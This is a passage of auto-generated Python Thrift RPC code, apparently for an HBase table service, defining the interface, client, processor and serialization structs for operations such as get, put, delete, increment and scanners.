from thrift.protocol import fastbinary
except:
fastbinary = None
class Iface:
def exists(self, table, get):
"""
Test for the existence of columns in the table, as specified in the TGet.
@return true if the specified TGet matches one or more keys, false if not
Parameters:
- table: the table to check on
- get: the TGet to check for
"""
pass
def get(self, table, get):
"""
Method for getting data from a row.
If the row cannot be found an empty Result is returned.
This can be checked by the empty field of the TResult
@return the result
Parameters:
- table: the table to get from
- get: the TGet to fetch
"""
pass
def getMultiple(self, table, gets):
"""
Method for getting multiple rows.
If a row cannot be found there will be a null
value in the result list for that TGet at the
same position.
So the Results are in the same order as the TGets.
Parameters:
- table: the table to get from
- gets: a list of TGets to fetch, the Result list
will have the Results at corresponding positions
or null if there was an error
"""
pass
def put(self, table, put):
"""
Commit a TPut to a table.
Parameters:
- table: the table to put data in
- put: the TPut to put
"""
pass
def checkAndPut(self, table, row, family, qualifier, value, put):
"""
Atomically checks if a row/family/qualifier value matches the expected
value. If it does, it adds the TPut.
@return true if the new put was executed, false otherwise
Parameters:
- table: to check in and put to
- row: row to check
- family: column family to check
- qualifier: column qualifier to check
- value: the expected value, if not provided the
check is for the non-existence of the
column in question
- put: the TPut to put if the check succeeds
"""
pass
def putMultiple(self, table, puts):
"""
Commit a List of Puts to the table.
Parameters:
- table: the table to put data in
- puts: a list of TPuts to commit
"""
pass
def deleteSingle(self, table, deleteSingle):
"""
Deletes as specified by the TDelete.
Note: "delete" is a reserved keyword and cannot be used in Thrift
thus the inconsistent naming scheme from the other functions.
Parameters:
- table: the table to delete from
- deleteSingle: the TDelete to delete
"""
pass
def deleteMultiple(self, table, deletes):
"""
Bulk commit a List of TDeletes to the table.
Throws a TIOError if any of the deletes fail.
Always returns an empty list for backwards compatibility.
Parameters:
- table: the table to delete from
- deletes: list of TDeletes to delete
"""
pass
def checkAndDelete(self, table, row, family, qualifier, value, deleteSingle):
"""
Atomically checks if a row/family/qualifier value matches the expected
value. If it does, it adds the delete.
@return true if the new delete was executed, false otherwise
Parameters:
- table: to check in and delete from
- row: row to check
- family: column family to check
- qualifier: column qualifier to check
- value: the expected value, if not provided the
check is for the non-existence of the
column in question
- deleteSingle: the TDelete to execute if the check succeeds
"""
pass
def increment(self, table, increment):
"""
Parameters:
- table: the table to increment the value on
- increment: the TIncrement to increment
"""
pass
def openScanner(self, table, scan):
"""
Get a Scanner for the provided TScan object.
@return Scanner Id to be used with other scanner procedures
Parameters:
- table: the table to get the Scanner for
- scan: the scan object to get a Scanner for
"""
pass
def getScannerRows(self, scannerId, numRows):
"""
Grabs multiple rows from a Scanner.
@return Between zero and numRows TResults
Parameters:
- scannerId: the Id of the Scanner to return rows from. This is an Id returned from the openScanner function.
- numRows: number of rows to return
"""
pass
def closeScanner(self, scannerId):
"""
Closes the scanner. Should be called if you need to close
the Scanner before all results are read.
Exhausted scanners are closed automatically.
Parameters:
- scannerId: the Id of the Scanner to close *
"""
pass
class Client(Iface):
def __init__(self, iprot, oprot=None):
self._iprot = self._oprot = iprot
if oprot is not None:
self._oprot = oprot
self._seqid = 0
def exists(self, table, get):
"""
Test for the existence of columns in the table, as specified in the TGet.
@return true if the specified TGet matches one or more keys, false if not
Parameters:
- table: the table to check on
- get: the TGet to check for
"""
self.send_exists(table, get)
return self.recv_exists()
def send_exists(self, table, get):
self._oprot.writeMessageBegin('exists', TMessageType.CALL, self._seqid)
args = exists_args()
args.table = table
args.get = get
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_exists(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = exists_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.io is not None:
raise result.io
raise TApplicationException(TApplicationException.MISSING_RESULT, "exists failed: unknown result");
def get(self, table, get):
"""
Method for getting data from a row.
If the row cannot be found an empty Result is returned.
This can be checked by the empty field of the TResult
@return the result
Parameters:
- table: the table to get from
- get: the TGet to fetch
"""
self.send_get(table, get)
return self.recv_get()
def send_get(self, table, get):
self._oprot.writeMessageBegin('get', TMessageType.CALL, self._seqid)
args = get_args()
args.table = table
args.get = get
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = get_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.io is not None:
raise result.io
raise TApplicationException(TApplicationException.MISSING_RESULT, "get failed: unknown result");
def getMultiple(self, table, gets):
"""
Method for getting multiple rows.
If a row cannot be found there will be a null
value in the result list for that TGet at the
same position.
So the Results are in the same order as the TGets.
Parameters:
- table: the table to get from
- gets: a list of TGets to fetch, the Result list
will have the Results at corresponding positions
or null if there was an error
"""
self.send_getMultiple(table, gets)
return self.recv_getMultiple()
def send_getMultiple(self, table, gets):
self._oprot.writeMessageBegin('getMultiple', TMessageType.CALL, self._seqid)
args = getMultiple_args()
args.table = table
args.gets = gets
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_getMultiple(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = getMultiple_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.io is not None:
raise result.io
raise TApplicationException(TApplicationException.MISSING_RESULT, "getMultiple failed: unknown result");
def put(self, table, put):
"""
Commit a TPut to a table.
Parameters:
- table: the table to put data in
- put: the TPut to put
"""
self.send_put(table, put)
self.recv_put()
def send_put(self, table, put):
self._oprot.writeMessageBegin('put', TMessageType.CALL, self._seqid)
args = put_args()
args.table = table
args.put = put
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_put(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = put_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.io is not None:
raise result.io
return
def checkAndPut(self, table, row, family, qualifier, value, put):
"""
Atomically checks if a row/family/qualifier value matches the expected
value. If it does, it adds the TPut.
@return true if the new put was executed, false otherwise
Parameters:
- table: to check in and put to
- row: row to check
- family: column family to check
- qualifier: column qualifier to check
- value: the expected value, if not provided the
check is for the non-existence of the
column in question
- put: the TPut to put if the check succeeds
"""
self.send_checkAndPut(table, row, family, qualifier, value, put)
return self.recv_checkAndPut()
def send_checkAndPut(self, table, row, family, qualifier, value, put):
self._oprot.writeMessageBegin('checkAndPut', TMessageType.CALL, self._seqid)
args = checkAndPut_args()
args.table = table
args.row = row
args.family = family
args.qualifier = qualifier
args.value = value
args.put = put
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_checkAndPut(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = checkAndPut_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.io is not None:
raise result.io
raise TApplicationException(TApplicationException.MISSING_RESULT, "checkAndPut failed: unknown result");
def putMultiple(self, table, puts):
"""
Commit a List of Puts to the table.
Parameters:
- table: the table to put data in
- puts: a list of TPuts to commit
"""
self.send_putMultiple(table, puts)
self.recv_putMultiple()
def send_putMultiple(self, table, puts):
self._oprot.writeMessageBegin('putMultiple', TMessageType.CALL, self._seqid)
args = putMultiple_args()
args.table = table
args.puts = puts
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_putMultiple(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = putMultiple_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.io is not None:
raise result.io
return
def deleteSingle(self, table, deleteSingle):
"""
Deletes as specified by the TDelete.
Note: "delete" is a reserved keyword and cannot be used in Thrift
thus the inconsistent naming scheme from the other functions.
Parameters:
- table: the table to delete from
- deleteSingle: the TDelete to delete
"""
self.send_deleteSingle(table, deleteSingle)
self.recv_deleteSingle()
def send_deleteSingle(self, table, deleteSingle):
self._oprot.writeMessageBegin('deleteSingle', TMessageType.CALL, self._seqid)
args = deleteSingle_args()
args.table = table
args.deleteSingle = deleteSingle
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_deleteSingle(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = deleteSingle_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.io is not None:
raise result.io
return
def deleteMultiple(self, table, deletes):
"""
Bulk commit a List of TDeletes to the table.
Throws a TIOError if any of the deletes fail.
Always returns an empty list for backwards compatibility.
Parameters:
- table: the table to delete from
- deletes: list of TDeletes to delete
"""
self.send_deleteMultiple(table, deletes)
return self.recv_deleteMultiple()
def send_deleteMultiple(self, table, deletes):
self._oprot.writeMessageBegin('deleteMultiple', TMessageType.CALL, self._seqid)
args = deleteMultiple_args()
args.table = table
args.deletes = deletes
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_deleteMultiple(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = deleteMultiple_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.io is not None:
raise result.io
raise TApplicationException(TApplicationException.MISSING_RESULT, "deleteMultiple failed: unknown result");
def checkAndDelete(self, table, row, family, qualifier, value, deleteSingle):
"""
Atomically checks if a row/family/qualifier value matches the expected
value. If it does, it adds the delete.
@return true if the new delete was executed, false otherwise
Parameters:
- table: to check in and delete from
- row: row to check
- family: column family to check
- qualifier: column qualifier to check
- value: the expected value, if not provided the
check is for the non-existence of the
column in question
- deleteSingle: the TDelete to execute if the check succeeds
"""
self.send_checkAndDelete(table, row, family, qualifier, value, deleteSingle)
return self.recv_checkAndDelete()
def send_checkAndDelete(self, table, row, family, qualifier, value, deleteSingle):
self._oprot.writeMessageBegin('checkAndDelete', TMessageType.CALL, self._seqid)
args = checkAndDelete_args()
args.table = table
args.row = row
args.family = family
args.qualifier = qualifier
args.value = value
args.deleteSingle = deleteSingle
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_checkAndDelete(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = checkAndDelete_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.io is not None:
raise result.io
raise TApplicationException(TApplicationException.MISSING_RESULT, "checkAndDelete failed: unknown result");
def increment(self, table, increment):
"""
Parameters:
- table: the table to increment the value on
- increment: the TIncrement to increment
"""
self.send_increment(table, increment)
return self.recv_increment()
def send_increment(self, table, increment):
self._oprot.writeMessageBegin('increment', TMessageType.CALL, self._seqid)
args = increment_args()
args.table = table
args.increment = increment
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_increment(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = increment_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.io is not None:
raise result.io
raise TApplicationException(TApplicationException.MISSING_RESULT, "increment failed: unknown result");
def openScanner(self, table, scan):
"""
Get a Scanner for the provided TScan object.
@return Scanner Id to be used with other scanner procedures
Parameters:
- table: the table to get the Scanner for
- scan: the scan object to get a Scanner for
"""
self.send_openScanner(table, scan)
return self.recv_openScanner()
def send_openScanner(self, table, scan):
self._oprot.writeMessageBegin('openScanner', TMessageType.CALL, self._seqid)
args = openScanner_args()
args.table = table
args.scan = scan
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_openScanner(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = openScanner_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.io is not None:
raise result.io
raise TApplicationException(TApplicationException.MISSING_RESULT, "openScanner failed: unknown result");
def getScannerRows(self, scannerId, numRows):
"""
Grabs multiple rows from a Scanner.
@return Between zero and numRows TResults
Parameters:
- scannerId: the Id of the Scanner to return rows from. This is an Id returned from the openScanner function.
- numRows: number of rows to return
"""
self.send_getScannerRows(scannerId, numRows)
return self.recv_getScannerRows()
def send_getScannerRows(self, scannerId, numRows):
self._oprot.writeMessageBegin('getScannerRows', TMessageType.CALL, self._seqid)
args = getScannerRows_args()
args.scannerId = scannerId
args.numRows = numRows
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_getScannerRows(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = getScannerRows_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.io is not None:
raise result.io
if result.ia is not None:
raise result.ia
raise TApplicationException(TApplicationException.MISSING_RESULT, "getScannerRows failed: unknown result");
def closeScanner(self, scannerId):
"""
Closes the scanner. Should be called if you need to close
the Scanner before all results are read.
Exhausted scanners are closed automatically.
Parameters:
- scannerId: the Id of the Scanner to close *
"""
self.send_closeScanner(scannerId)
self.recv_closeScanner()
def send_closeScanner(self, scannerId):
self._oprot.writeMessageBegin('closeScanner', TMessageType.CALL, self._seqid)
args = closeScanner_args()
args.scannerId = scannerId
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_closeScanner(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = closeScanner_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.io is not None:
raise result.io
if result.ia is not None:
raise result.ia
return
class Processor(Iface, TProcessor):
def __init__(self, handler):
self._handler = handler
self._processMap = {}
self._processMap["exists"] = Processor.process_exists
self._processMap["get"] = Processor.process_get
self._processMap["getMultiple"] = Processor.process_getMultiple
self._processMap["put"] = Processor.process_put
self._processMap["checkAndPut"] = Processor.process_checkAndPut
self._processMap["putMultiple"] = Processor.process_putMultiple
self._processMap["deleteSingle"] = Processor.process_deleteSingle
self._processMap["deleteMultiple"] = Processor.process_deleteMultiple
self._processMap["checkAndDelete"] = Processor.process_checkAndDelete
self._processMap["increment"] = Processor.process_increment
self._processMap["openScanner"] = Processor.process_openScanner
self._processMap["getScannerRows"] = Processor.process_getScannerRows
self._processMap["closeScanner"] = Processor.process_closeScanner
def process(self, iprot, oprot):
(name, type, seqid) = iprot.readMessageBegin()
if name not in self._processMap:
iprot.skip(TType.STRUCT)
iprot.readMessageEnd()
x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
x.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
return
else:
self._processMap[name](self, seqid, iprot, oprot)
return True
def process_exists(self, seqid, iprot, oprot):
args = exists_args()
args.read(iprot)
iprot.readMessageEnd()
result = exists_result()
try:
result.success = self._handler.exists(args.table, args.get)
except TIOError as io:
result.io = io
oprot.writeMessageBegin("exists", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_get(self, seqid, iprot, oprot):
args = get_args()
args.read(iprot)
iprot.readMessageEnd()
result = get_result()
try:
result.success = self._handler.get(args.table, args.get)
except TIOError as io:
result.io = io
oprot.writeMessageBegin("get", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_getMultiple(self, seqid, iprot, oprot):
args = getMultiple_args()
args.read(iprot)
iprot.readMessageEnd()
result = getMultiple_result()
try:
result.success = self._handler.getMultiple(args.table, args.gets)
except TIOError as io:
result.io = io
oprot.writeMessageBegin("getMultiple", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_put(self, seqid, iprot, oprot):
args = put_args()
args.read(iprot)
iprot.readMessageEnd()
result = put_result()
try:
self._handler.put(args.table, args.put)
except TIOError as io:
result.io = io
oprot.writeMessageBegin("put", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_checkAndPut(self, seqid, iprot, oprot):
args = checkAndPut_args()
args.read(iprot)
iprot.readMessageEnd()
result = checkAndPut_result()
try:
result.success = self._handler.checkAndPut(args.table, args.row, args.family, args.qualifier, args.value, args.put)
except TIOError as io:
result.io = io
oprot.writeMessageBegin("checkAndPut", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_putMultiple(self, seqid, iprot, oprot):
args = putMultiple_args()
args.read(iprot)
iprot.readMessageEnd()
result = putMultiple_result()
try:
self._handler.putMultiple(args.table, args.puts)
except TIOError as io:
result.io = io
oprot.writeMessageBegin("putMultiple", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_deleteSingle(self, seqid, iprot, oprot):
args = deleteSingle_args()
args.read(iprot)
iprot.readMessageEnd()
result = deleteSingle_result()
try:
self._handler.deleteSingle(args.table, args.deleteSingle)
except TIOError as io:
result.io = io
oprot.writeMessageBegin("deleteSingle", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_deleteMultiple(self, seqid, iprot, oprot):
args = deleteMultiple_args()
args.read(iprot)
iprot.readMessageEnd()
result = deleteMultiple_result()
try:
result.success = self._handler.deleteMultiple(args.table, args.deletes)
except TIOError as io:
result.io = io
oprot.writeMessageBegin("deleteMultiple", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_checkAndDelete(self, seqid, iprot, oprot):
args = checkAndDelete_args()
args.read(iprot)
iprot.readMessageEnd()
result = checkAndDelete_result()
try:
result.success = self._handler.checkAndDelete(args.table, args.row, args.family, args.qualifier, args.value, args.deleteSingle)
except TIOError as io:
result.io = io
oprot.writeMessageBegin("checkAndDelete", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_increment(self, seqid, iprot, oprot):
args = increment_args()
args.read(iprot)
iprot.readMessageEnd()
result = increment_result()
try:
result.success = self._handler.increment(args.table, args.increment)
except TIOError as io:
result.io = io
oprot.writeMessageBegin("increment", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_openScanner(self, seqid, iprot, oprot):
args = openScanner_args()
args.read(iprot)
iprot.readMessageEnd()
result = openScanner_result()
try:
result.success = self._handler.openScanner(args.table, args.scan)
except TIOError as io:
result.io = io
oprot.writeMessageBegin("openScanner", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_getScannerRows(self, seqid, iprot, oprot):
args = getScannerRows_args()
args.read(iprot)
iprot.readMessageEnd()
result = getScannerRows_result()
try:
result.success = self._handler.getScannerRows(args.scannerId, args.numRows)
except TIOError as io:
result.io = io
except TIllegalArgument as ia:
result.ia = ia
oprot.writeMessageBegin("getScannerRows", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_closeScanner(self, seqid, iprot, oprot):
args = closeScanner_args()
args.read(iprot)
iprot.readMessageEnd()
result = closeScanner_result()
try:
self._handler.closeScanner(args.scannerId)
except TIOError as io:
result.io = io
except TIllegalArgument as ia:
result.ia = ia
oprot.writeMessageBegin("closeScanner", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
# HELPER FUNCTIONS AND STRUCTURES
class exists_args:
"""
Attributes:
- table: the table to check on
- get: the TGet to check for
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'table', None, None, ), # 1
(2, TType.STRUCT, 'get', (TGet, TGet.thrift_spec), None, ), # 2
)
def __init__(self, table=None, get=None,):
self.table = table
self.get = get
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.table = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.get = TGet()
self.get.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('exists_args')
if self.table is not None:
oprot.writeFieldBegin('table', TType.STRING, 1)
oprot.writeString(self.table)
oprot.writeFieldEnd()
if self.get is not None:
oprot.writeFieldBegin('get', TType.STRUCT, 2)
self.get.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.table is None:
raise TProtocol.TProtocolException(message='Required field table is unset!')
if self.get is None:
raise TProtocol.TProtocolException(message='Required field get is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class exists_result:
"""
Attributes:
- success
- io
"""
thrift_spec = (
(0, TType.BOOL, 'success', None, None, ), # 0
(1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
)
def __init__(self, success=None, io=None,):
self.success = success
self.io = io
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.BOOL:
self.success = iprot.readBool();
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.io = TIOError()
self.io.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('exists_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.BOOL, 0)
oprot.writeBool(self.success)
oprot.writeFieldEnd()
if self.io is not None:
oprot.writeFieldBegin('io', TType.STRUCT, 1)
self.io.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_args:
"""
Attributes:
- table: the table to get from
- get: the TGet to fetch
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'table', None, None, ), # 1
(2, TType.STRUCT, 'get', (TGet, TGet.thrift_spec), None, ), # 2
)
def __init__(self, table=None, get=None,):
self.table = table
self.get = get
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.table = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.get = TGet()
self.get.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_args')
if self.table is not None:
oprot.writeFieldBegin('table', TType.STRING, 1)
oprot.writeString(self.table)
oprot.writeFieldEnd()
if self.get is not None:
oprot.writeFieldBegin('get', TType.STRUCT, 2)
self.get.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.table is None:
raise TProtocol.TProtocolException(message='Required field table is unset!')
if self.get is None:
raise TProtocol.TProtocolException(message='Required field get is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_result:
"""
Attributes:
- success
- io
"""
thrift_spec = (
(0, TType.STRUCT, 'success', (TResult, TResult.thrift_spec), None, ), # 0
(1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
)
def __init__(self, success=None, io=None,):
self.success = success
self.io = io
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = TResult()
self.success.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.io = TIOError()
self.io.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
if self.io is not None:
oprot.writeFieldBegin('io', TType.STRUCT, 1)
self.io.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getMultiple_args:
"""
Attributes:
- table: the table to get from
- gets: a list of TGets to fetch, the Result list
will have the Results at corresponding positions
or null if there was an error
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'table', None, None, ), # 1
(2, TType.LIST, 'gets', (TType.STRUCT,(TGet, TGet.thrift_spec)), None, ), # 2
)
def __init__(self, table=None, gets=None,):
self.table = table
self.gets = gets
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.table = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.LIST:
self.gets = []
(_etype45, _size42) = iprot.readListBegin()
for _i46 in xrange(_size42):
_elem47 = TGet()
_elem47.read(iprot)
self.gets.append(_elem47)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getMultiple_args')
if self.table is not None:
